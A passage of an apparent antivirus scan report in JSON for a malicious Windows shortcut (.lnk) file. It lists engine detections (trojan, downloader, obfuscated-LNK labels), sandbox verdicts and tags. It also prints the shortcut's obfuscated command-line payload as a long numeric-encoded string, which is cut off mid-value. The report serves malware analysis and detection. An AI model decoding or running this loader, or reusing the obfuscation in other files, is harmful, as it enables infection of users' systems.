},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.47.59188",
"engine_update": "20260414",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"Baidu": {
"method": "blacklist",
"engine_name": "Baidu",
"engine_version": "1.0.0.2",
"engine_update": "20190318",
"category": "undetected",
"result": null
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1185",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260414",
"category": "malicious",
"result": "TROJ_FRS.0NA103CR26"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260414",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5580",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260414",
"category": "malicious",
"result": "TROJ_FRS.0NA103CR26"
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14392",
"engine_update": "20260414",
"category": "malicious",
"result": "Trojan:Shortcut/SuspiciousLNK.SPCS!1"
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.4.1.0",
"engine_update": "20260414",
"category": "malicious",
"result": "Mal/LnkObf-A"
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "8da278c:8da278c:a198e11:a198e11",
"engine_update": "20260413",
"category": "malicious",
"result": "HEUR:Trojan/LNK.Agent.b"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260412",
"category": "undetected",
"result": null
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260414",
"category": "malicious",
"result": "LNK/ABTrojan.YQZV-"
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.243.174",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26030.3008",
"engine_update": "20260414",
"category": "malicious",
"result": "Trojan:Win32/Ravartar!rfn"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.23-113519599",
"engine_update": "20260414",
"category": "malicious",
"result": "Mal/LnkObf-A"
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1776142840",
"engine_update": "20260414",
"category": "malicious",
"result": "Detected"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.29.3.10609",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-04-14.01",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.4.16.0",
"engine_update": "20260413",
"category": "malicious",
"result": "Trojan-Downloader.PS.Agent"
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260414",
"category": "malicious",
"result": "Win32.Trojan.Agent.Uwhl"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260413",
"category": "malicious",
"result": "Trojan-JACI!302725413076"
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.2.19",
"engine_update": "20260324",
"category": "undetected",
"result": null
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.30.0",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan:Win/Kimsuky.AM"
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44185AVA:64.31031",
"engine_update": "20260414",
"category": "confirmed-timeout",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": null,
"engine_update": "20260413",
"category": "timeout",
"result": null
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": null,
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": null,
"engine_update": "20260413",
"category": "timeout",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260322",
"category": "failure",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260322",
"category": "failure",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260407",
"category": "failure",
"result": null
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260413-00",
"engine_update": "20260413",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20251216",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260414",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.255",
"engine_update": "20260327",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.769",
"engine_update": "20260413",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260414",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.11.0",
"engine_update": "20260331",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260410",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260414",
"category": "type-unsupported",
"result": null
}
},
"size": 987042,
"last_analysis_stats": {
"malicious": 20,
"suspicious": 0,
"undetected": 28,
"harmless": 0,
"timeout": 12,
"confirmed-timeout": 1,
"failure": 3,
"type-unsupported": 12
},
"filecondis": {
"dhash": "b3a0b49a9092a382",
"raw_md5": "0e5a15f0d054bcbfddecd5fd3f7db1c4"
},
"sandbox_verdicts": {
"Zenbox": {
"category": "malicious",
"malware_classification": [
"MALWARE",
"EVADER"
],
"sandbox_name": "Zenbox",
"confidence": 68
},
"Dr.Web vxCube": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Dr.Web vxCube"
}
},
"sigma_analysis_stats": {
"critical": 0,
"high": 4,
"medium": 3,
"low": 3
},
"last_analysis_date": 1776146239,
"ssdeep": "1536:FJbFi322qPJ2XN/eNYPKPfuuzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzH:FJbFi322qPJ2XN/eNYPKPfuT",
"last_modification_date": 1776153895,
"sigma_analysis_summary": {
"Joe Security Rule Set (GitHub)": {
"critical": 0,
"high": 1,
"medium": 0,
"low": 0
},
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 3,
"medium": 3,
"low": 3
}
},
"total_votes": {
"harmless": 0,
"malicious": 1
},
"magika": "LNK",
"tags": [
"large-file",
"hiding-window",
"long-command-line-arguments",
"lnk",
"detect-debug-environment",
"abused-exe-pattern",
"executes-dropped-file"
],
"type_extension": "lnk",
"times_submitted": 2,
"lnk_info": {
"modification_date": "1970-01-01T00:00:00Z",
"link_flags": [
"HasName",
"IsUnicode",
"HasExprString",
"HasArguments",
"PreferEnvironmentPath",
"HasIconLocation"
],
"command_line_arguments": " \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 88 115 116 88 57 24 117 116 72 61 94 62 42 36 161 176 140 141 140 235 182 11 237 68 25 235 34 31 236 153 17 236 21 41 235 1 181 235 19 85 236 41 17 64 235 176 58 122 235 43 6 235 182 11 234 37 53 234 179 27 234 176 45 236 49 13 235 176 169 236 52 81 135 61 74 57 124 81 165 114 65 57 58 43 126 79 169 183 77 57 58 125 115 106 89 102 123 126 140 116 124 93 98 112 147 130 140 43 50 106 158 183 84 75 128 60 124 97 167 106 72 139 115 123 61 24 94 110 74 141 113 127 124 37 93 105 84 57 129 52 72 25 93 96 66 68 84 58 101 55 89 169 129 51 126 75 60 70 146 146 110 96 120 82 77 28 83 138 75 104 99 59 74 28 86 128 71 91 125 70 39 84 155 169 132 127 125 104 109 41 101 98 72 124 76 125 99 108 165 105 67 62 68 58 59 24 128 117 149 112 142 125 51 39 83 112 71 128 71 45 47 23 89 164 132 125 125 104 109 89 154 103 76 126 70 54 56 39 87 183 122 137 76 45 61 30 102 113 103 76 65 58 126 79 169 183 72 76 69 49 124 81 169 181 79 68 66 58 78 43 85 113 149 112 142 125 58 29 102 97 135 61 74 57 124 81 165 117 62 65 66 51 50 108 140 185 147 137 71 43 42 24 85 170 84 61 69 112 40 88 154 105 67 62 68 58 59 24 86 170 145 133 83 42 44 35 108 159 123 104 59 60 61 28 100 149 84 57 77 76 42 26 96 107 78 133 138 47 44 29 95 116 82 57 101 59 117 99 154 103 80 61 63 44 53 24 90 103 60 126 72 54 50 39 86 170 145 133 83 42 44 35 108 159 123 104 59 60 61 28 100 149 84 57 77 76 42 26 96 107 78 133 138 57 53 32 100 137 84 57 70 118 117 93 87 120 62 110 60 58 56 79 165 119 67 76 64 60 54 62 104 108 80 139 115 127 122 43 98 116 71 57 113 119 124 63 90 95 76 65 66 62 111 87 155 169 147 129 140 119 71 35 91 117 70 54 59 125 114 106 169 139 97 141 125 111 112 92 142 185 94 68 64 125 114 106 147 165 122 141 54 105 106 99 167 173 147 108 62 47 50 39 114 116 147 129 140 61 83 35 85 170 128 122 119 113 107 86 167 173 147 133 99 87 74 63 125 173 73 68 67 58 126 69 100 118 74 62 133 125 114 106 134 113 67 139 130 125 47 31 100 183 137 139 127 110 106 87 167 173 147 125 128 111 124 96 167 171 133 127 126 125 114 106 118 120 79 76 60 54 111 87 150 162 135 122 120 125 117 108 156 111 70 68 64 127 124 108 167 158 149 137 70 58 61 40 100 103 66 141 113 127 94 17 167 137 99 100 88 94 74 71 156 133 102 98 105 81 124 108 140 185 145 76 58 52 51 33 76 158 149 100 64 41 47 33 100 172 99 72 59 43 81 39 85 113 70 73 142 114 73 26 96 185 145 73 55 51 50 32 93 185 136 101 73 62 58 39 87 102 149 137 70 58 61 40 100 103 66 141 129 74 43 39 87 152 78 72 64 43 126 104 104 114 80 63 58 127 113 61 84 101 111 68 66 58 126 104 80 96 60 73 142 114 73 25 100 151 84 58 69 60 78 43 87 102 76 63 71 100 120 104 80 96 60 73 115 127 126 104 86 102 66 141 113 127 84 29 96 107 136 93 77 43 54 108 161 181 80 63 56 101 93 28 89 149 84 57 77 118 126 106 154 140 76 74 60 48 43 29 99 101 134 86 69 49 58 29 82 102 134 89 73 50 46 32 104 101 80 58 127 70 61 36 90 106 135 67 59 58 124 81 169 181 70 62 63 127 97 108 127 106 76 63 129 79 61 24 97 185 141 137 73 49 40 82 136 105 69 105 77 43 61 99 169 183 134 96 69 60 44 29 86 106 79 57 127 72 53 30 101 106 62 58 127 75 57 31 89 109 84 57 73 44 111 51 104 113 70 62 128 45 42 38 167 158 149 137 52 48 47 39 169 156 149 139 85 62 54 29 90 171 67 57 72 125 99 104 100 103 83 98 99 86 126 79 169 183 145 70 58 43 42 24 154 120 69 68 127 41 106 93 89 103 70 67 73 60 42 25 154 181 141 82 57 45 53 47 143 159 112 58 75 62 46 39 133 120 65 76 91 43 44 35 91 114 141 137 62 45 47 34 100 118 65 100 74 118 117 93 87 116 69 62 59 54 42 29 87 96 134 71 69 51 57 25 154 181 141 82 57 45 53 47 143 159 112 58 75 62 46 39 133 120 65 76 91 43 44 35 91 114 141 137 52 48 47 39 160 176 134 59 77 40 95 26 100 115 120 137 76 45 61 30 102 113 103 76 65 58 124 81 169 144 71 55 63 52 57 95 114 116 83 91 73 46 41 39 86 101 149 128 89 45 53 108 165 116 67 75 99 84 85 108 156 145 80 76 74 58 44 25 169 181 77 72 77 59 57 26 86 185 136 88 59 58 44 75 98 116 71 57 142 123 61 37 100 107 65 141 129 80 41 24 131 112 73 72 142 123 47 29 90 185 136 88 59 58 92 43 86 112 82 93 77 45 43 35 91 114 122 141 60 58 48 43 92 116 136 68 58 58 49 108 156 105 84 57 70 127 122 29 90 106 149 128 64 58 39 30 104 108 80 141 138 44 43 25 142 185 149 137 62 47 46 108 140 185 107 62 69 49 113 60 104 101 77 141 134 123 57 30 83 159 116 61 62 91 61 24 104 176 149 139 127 82 53 41 87 106 66 62 72 43 111 53 96 107 81 62 55 44 111 73 93 106 64 73 91 43 47 26 100 170 79 76 75 58 60 29 90 110 135 61 59 110 124 81 169 181 66 57 60 127 97 108 162 181 84 65 69 44 97 76 161 183 72 62 60 38 75 24 167 173 147 117 117 103 124 96 167 149 80 59 69 41 57 106 160 158 145 64 59 98 113 34 90 112 71 141 134 125 81 39 167 173 145 76 66 54 43 49 153 124 137 139 60 58 61 31 167 176 122 137 60 57 97 95 95 106 76 63 134 125 76 38 102 167 147 129 138 62 50 35 86 126 132 80 130 123 61 32 96 102 90 123 81 115 124 74 80 101 80 58 140 118 99 104 86 101 67 112 110 119 122 31 86 173 147 59 53 47 42 29 167 173 145 59 72 115 126 106 100 102 104 76 64 62 55 106 157 185 147 59 73 62 124 99 142 181 67 72 62 98 94 100 167 108 66 53 140 115 124 26 81 183 137 139 92 89 90 74 167 173 147 64 77 49 55 106 157 185 147 71 72 125 117 81 165 117 80 71 142 98 126 106 84 102 76 63 71 127 75 19 86 101 80 64 115 42 43 35 91 114 149 90 53 44 42 39 92 171 108 94 115 42 43 35 91 114 149 90 53 44 42 39 92 171 98 72 75 42 44 35 85 96 135 106 60 39 55 26 104 105 77 52 115 47 41 42 93 112 82 141 75 51 61 25 86 185 108 63 69 43 35 28 84 119 73 68 75 127 43 24 104 101 76 74 142 93 37 24 100 126 88 141 106 58 59 100 135 96 65 72 83 66 126 35 91 151 60 57 73 44 114 25 85 103 76 63 71 127 46 21 101 176 58 64 59 39 126 35 92 156 71 72 55 127 49 25 81 177 76 63 108 38 42 39 86 176 122 107 53 43 57 49 108 185 66 112 64 58 39 108 135 96 65 72 83 108 108 47 142 112 71 57 142 51 57 30 140 112 72 127 92 58 61 40 161 102 137 125 130 44 112 64 100 107 78 57 70 118 99 35 99 177 73 72 64 126 97 25 155 141 80 63 71 43 54 99 78 103 80 57 57 45 48 108 91 100 73 65 115 34 92 19 85 116 90 80 142 60 60 64 100 107 120 63 73 40 126 74 80 101 80 82 122 66 99 35 92 171 99 72 77 59 118 41 103 141 80 63 130 111 114 88 160 158 99 103 106 93 126 28 103 110 120 63 73 40 126 58 131 149 115 133 62 40 58 96 86 176 122 107 53 43 57 49 108 185 74 72 53 98 46 42 94 171 110 72 58 93 37 24 100 102 141 122 124 118 99 74 80 101 80 82 81 127 53 22 140 105 83 66 128 88 57 24 135 96 65 72 59 119 109 86 160 158 116 64 77 49 55 39 101 185 72 76 113 49 57 21 169 152 72 76 64 56 57 40 161 176 122 100 107 45 38 56 87 120 71 58 72 48 44 31 169 149 80 74 113 50 61 94 134 115 79 57 73 91 57 41 87 97 67 133 67 58 37 96 96 99 140 114 107 45 38 57 85 115 79 64 142 60 43 79 91 116 62 141 107 45 38 57 85 115 79 64 134 54 49 96 133 116 82 129 126 118 99 31 86 97 149 62 65 98 48 39 82 185 72 58 54 119 117 81 102 102 135 106 63 47 37 56 90 177 70 64 133 100 47 31 155 149 76 58 62 48 43 39 161 176 122 59 73 43 41 26 91 185 70 64 128 75 47 75 87 103 84 52 134 118 99 15 76 183 122 137 69 98 110 81 165 120 120 137 69 116 122 43 87 114 66 82 125 66 99 104 89 156 147 69 63 48 46 106 142 181 66 112 110 119 124 82 167 173 147 58 116 125 117 81 165 103 120 137 62 127 113 26 100 105 73 76 75 58 126 106 90 183 137 139 58 125 99 38 90 103 80 76 75 55 118 104 96 101 80 64 142 54 48 108 165 103 80 61 133 36 122 40 100 115 120 137 74 58 56 108 156 103 80 61 66 62 59 39 169 181 76 57 73 50 114 104 86 101 67 82 138 54 65 81 165 112 138 130 115 34 93 40 101 172 97 52 62 58 126 95 117 96 69 72 106 58 56 35 91 112 65 68 63 49 126 104 101 116 79 114 138 47 39 40 169 156 149 139 99 54 82 64 121 162 66 58 139 125 99 104 100 116 80 141 113 127 84 29 96 107 136 93 77 43 54 108 161 181 80 63 56 101 93 28 89 149 84 57 77 118 126 106 91 116 62 58 128 47 43 91 167 158 145 70 58 43 42 24 169 156 149 139 70 43 42 28 86 159 134 126 71 54 42 32 104 119 135 74 63 50 124 81 165 120 65 66 67 52 126 79 169 183 78 65 62 62 42 95 94 131 66 65 53 44 53 50 100 160 96 61 126 107 36 92 117 119 111 118 103 88 81 86 124 136 69 55 95 53 89 65 101 133 69 58 85 49 76 91 112 98 125 127 126 110 112 91 146 168 82 73 55 50 109 42 167 158 145 61 60 48 52 39 102 101 108 73 142 98 126 106 94 116 63 68 64 114 55 26 90 100 69 120 125 111 109 85 152 166 134 59 69 112 54 35 99 116 67 139 115 123 60 26 104 107 82 69 96 62 49 39 169 156 149 139 65 62 53 30 167 158 145 71 69 51 57 60 104 101 77 141 113 127 124 25 102 120 73 65 128 43 38 24 167 158 145 73 55 51 50 32 93 185 120 141 140 123 55 24 85 101 65 126 77 47 53 93 83 165 134 61 60 48 52 39 102 101 66 126 138 119 67 23 87 112 88 115 116 90 43 41 104 105 80 105 77 43 61 57 85 103 76 63 71 119 122 28 87 106 75 72 75 43 85 40 160 176 134 59 73 47 47 25 96 101 70 59 53 112 56 35 93 116 66 126 138 119 67 23 87 112 88 115 116 90 43 41 104 105 80 105 77 43 61 57 85 103 76 63 71 119 122 38 96 109 80 93 77 43 54 99 160 170 67 76 55 96 44 39 99 156 145 75 60 62 48 41 97 139 84 64 73 125 99 104 104 114 80 63 58 98 118 106 124 106 59 68 66 51 61 93 148 171 133 139 130 125 118 53 96 107 81 62 55 44 124 96 167 185 103 89 142 110 110 94 153 158 149 86 69 49 124 96 167 163 129 114 142 39 104 88 160 183 137 139 109 47 46 32 100 130 80 139 130 125 60 65 96 101 134 120 123 104 112 89 147 183 137 139 134 84 86 56 124 141 137 65 69 52 57 108 130 116 82 66 63 118 124 96 167 150 77 59 140 115 124 29 92 116 147 129 140 112 109 88 148 183 137 139 126 113 110 106 157 183 135 125 128 111 124 96 167 134 84 71 77 45 53 93 148 166 126 127 123 105 124 99 169 172 75 62 69 49 126 106 169 183 122 137 70 58 61 40 100 103 66 141 113 127 94 17 167 137 99 100 88 94 74 71 156 133 102 98 105 81 124 108 140 185 145 76 58 52 51 33 76 158 145 59 73 44 46 29 91 102 80 141 113 127 85 30 83 106 74 72 129 72 57 42 119 116 68 56 73 44 42 108 156 132 67 68 142 123 58 21 93 109 73 65 142 114 86 39 104 117 80 59 59 127 122 36 100 120 81 72 60 44 126 95 116 102 80 59 109 56 57 30 85 185 145 76 71 58 48 24 169 172 96 58 73 93 61 25 96 118 101 76 60 44 53 30 98 158 90 107 53 43 57 49 108 124 145 75 53 43 57 25 169 156 149 137 60 58 43 28 90 107 66 72 128 92 47 30 85 116 71 57 115 68 92 19 85 116 90 80 81 123 58 39 102 119 60 57 73 44 97 49 128 107 76 57 81 101 100 72 100 118 141 137 76 38 42 39 86 173 145 61 55 59 117 81 110 134 60 58 58 58 49 94 117 116 61 57 128 90 48 41 90 117 76 63 71 66 100 82 136 134 114 100 101 113 87 39 85 134 65 59 69 49 55 100 165 117 80 74 76 38 42 39 86 176 57 141 95 42 42 95 131 112 73 72 142 114 88 35 93 116 101 76 58 55 126 104 100 116 80 141 129 90 48 41 90 117 76 63 71 127 41 24 99 161 122 90 58 62 44 24 156 137 67 62 75 58 43 25 169 105 70 54 73 45 43 36 100 109 73 141 129 94 44 37 84 108 80 63 58 83 53 25 85 185 147 128 96 48 78 26 90 115 76 65 73 127 113 71 81 116 82 56 58 54 47 30 121 106 73 68 75 38 126 74 80 105 84 58 59 127 113 70 96 109 80 141 138 58 57 39 167 185 136 86 69 49 58 29 82 134 65 52 66 58 126 68 96 117 81 72 64 100 119 81 169 181 66 57 60 127 34 108 122 100 65 128 104 54 50 39 169 172 111 68 66 58 78 43 85 113 149 137 62 47 46 108 156 148 71 74 63 59 53 30 98 185 96 89 104 103 99 108 165 120 82 57 69 48 48 108 140 185 103 72 55 114 75 41 97 116 81 56 66 58 58 56 104 102 74 108 75 43 53 29 91 185 136 104 54 58 59 23 85 116 149 139 55 44 59 26 96 105 65 127 73 39 57 106 169 172 116 59 71 42 49 39 91 101 149 139 127 112 60 108 154 170 71 62 66 48 55 29 169 121 147 137 59 44 43 44 167 183 122 141 138 43 44 35 98 114 80 59 142 98 126 62 100 98 136 90 75 55 57 40 84 109 80 73 90 62 43 33 117 103 76 70 71 58 44 108 156 138 71 74 73 127 113 75 85 185 141 102 73 43 113 72 104 101 80 132 128 94 58 40 124 112 71 56 58 58 43 100 152 169 140 141 129 77 57 28 100 101 76 57 69 48 48 67 91 101 80 59 56 62 50 108 161 139 80 54 129 75 53 31 100 134 69 76 64 127 113 63 96 107 64 57 73 44 126 89 153 176 122 141 138 44 57 24 85 112 71 70 59 127 97 108 123 116 62 128 91 60 54 39 101 100 73 72 74 75 61 25 94 134 80 57 58 54 48 37 86 134 80 57 142 114 86 35 101 117 80 63 115 127 76 39 98 112 66 57 73 45 113 57 102 113 80 73 57 51 57 40 117 120 66 66 142 114 74 43 86 110 103 76 65 58 126 106 124 112 82 59 63 44 47 38 85 148 81 70 73 74 46 40 104 101 80 89 77 44 51 63 104 118 77 68 64 58 90 72 131 138 94 92 62 36 88 89 148 169 131 124 118 108 105 95 150 164 99 128 122 94 108 70 156 166 92 117 89 114 107 66 145 162 101 123 100 87 87 55 76 183 149 128 109 60 42 35 90 107 149 137 77 60 42 35 90 107 149 128 90 45 53 37 98 116 67 141 138 43 44 35 98 114 80 59 142 114 75 39 85 101 76 63 71 44 126 104 86 116 65 57 69 49 55 25 142 185 145 72 73 58 126 79 169 143 70 68 64 114 78 43 85 113 149 133 138 58 48 22 143 152 69 61 106 62 42 43 160 185 147 63 73 40 43 94 89 102 132 139 115 127 126 104 104 109 76 58 113 95 118 106 92 106 67 52 91 43 124 96 167 161 124 117 140 115 124 72 100 103 76 55 73 125 117 81 165 108 66 112 129 53 47 35 91 185 141 139 97 58 124 96 165 120 73 68 59 68 110 47 157 183 67 72 77 50 124 99 142 181 67 71 113 114 52 29 96 107 141 139 92 57 59 90 167 173 145 76 66 54 43 49 152 124 137 137 77 51 53 25 110 167 88 129 140 93 37 24 100 102 147 132 115 123 43 24 87 156 117 133 138 50 43 96 167 103 60 61 58 48 124 96 165 103 79 129 142 125 57 25 124 120 71 76 71 125 114 108 167 103 80 76 140 118 99 104 87 116 69 112 110 119 124 31 86 97 147 129 140 45 38 106 157 183 99 103 106 93 124 96 167 108 84 63 71 125 114 108 167 115 79 139 133 100 122 40 100 115 149 112 142 125 41 25 96 107 78 141 91 38 43 24 100 108 122 56 59 54 48 37 169 134 60 58 58 58 49 94 128 138 122 56 59 54 48 37 169 134 60 58 58 58 49 94 118 116 82 56 60 54 42 19 155 150 67 53 71 45 61 28 97 96 122 61 57 61 50 35 102 185 82 65 77 44 43 108 128 107 76 57 51 47 41 42 93 112 82 141 59 43 61 24 96 118 149 107 53 43 57 49 108 185 113 72 75 119 92 19 85 116 90 80 142 54 48 74 80 101 80 58 130 44 42 26 96 107 78 141 62 40 58 99 78 108 66 53 142 54 49 79 91 116 62 141 65 44 38 100 96 107 115 52 58 58 43 99 142 151 60 57 73 68 65 108 86 156 71 72 55 127 92 19 85 116 90 122 124 66 99 35 91 101 149 65 73 49 97 35 92 171 99 72 77 59 118 25 157 169 137 58 128 83 57 30 98 101 77 132 115 54 56 100 93 116 71 140 113 44 112 64 100 107 78 57 70 118 35 26 100 101 64 59 64 127 48 23 93 109 122 48 108 38 42 39 110 124 149 74 76 83 57 30 140 107 80 54 142 93 37 24 100 126 129 80 115 54 49 94 119 116 84 73 134 60 60 64 100 107 137 125 130 107 117 81 119 147 113 107 142 47 60 33 140 107 80 54 142 77 88 72 135 177 69 54 74 115 43 99 142 151 60 57 73 68 65 108 94 116 60 112 62 61 51 94 130 116 65 107 53 43 57 25 161 166 131 132 115 93 37 24 100 126 88 141 69 41 97 28 103 110 135 102 73 43 92 19 85 116 66 133 125 105 117 81 136 108 84 63 71 58 58 108 92 120 120 63 73 40 126 75 92 120 71 70 73 59 118 99 142 144 114 59 54 75 44 43 91 102 79 62 60 50 126 72 100 118 120 64 77 113 91 38 99 101 80 105 73 60 44 20 87 177 74 72 53 115 53 22 160 158 114 59 54 76 42 38 99 108 149 74 59 98 48 39 82 185 114 59 54 76 42 38 99 108 141 68 65 115 90 39 102 173 133 132 115 50 43 20 169 106 72 112 64 58 39 108 92 102 61 133 133 100 59 25 155 150 70 61 53 75 47 100 90 108 140 114 63 50 112 72 96 102 69 62 59 58 118 99 142 103 80 57 